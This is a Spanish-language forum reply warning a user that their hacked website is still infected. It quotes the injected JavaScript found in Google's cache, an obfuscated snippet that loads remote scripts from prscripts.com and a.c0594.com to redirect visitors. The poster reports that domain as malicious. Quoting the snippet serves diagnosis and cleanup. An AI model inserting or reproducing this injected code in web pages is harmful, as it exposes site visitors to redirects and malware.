Buscando errores de PHP de su sitio en google aparece una de las url que google cacheo la cual esta infectada con esto:
PHP:
<script type="text/javascript"> var _prvar=_prvar||new Object(); (function(pa,s){if(document.getElementById('pr48960776'))return false; pa=document.createElement('script');pa.type='text/javascript';pa.async=true;pa.id='pr48960776';pa.src='//prscripts.com/pub.js'; s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(pa,s);})();document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://a.c'+'0594.com/?js=14"></'+'scr'+'ipt>');</script>
</head>
La cual AUN esas infectado, no has eliminado por completo el hackeo...
ese es el codigo que redirecciona a otro sitio... google muestra:
En todo tu sitio aun estan los codigos anteriores... si realmente lo limpiaste, pues te hackearon nuevamente... Yo no le veo continuar mas a esto, [MENTION=28762]tnc05[/MENTION] tu sitio fue hackeado, no infectado por kanikase....
PD: el dominio c0594.com el cual usan para redireccionar a otros lados esta reportada como virus y esta registrada desde el 2014...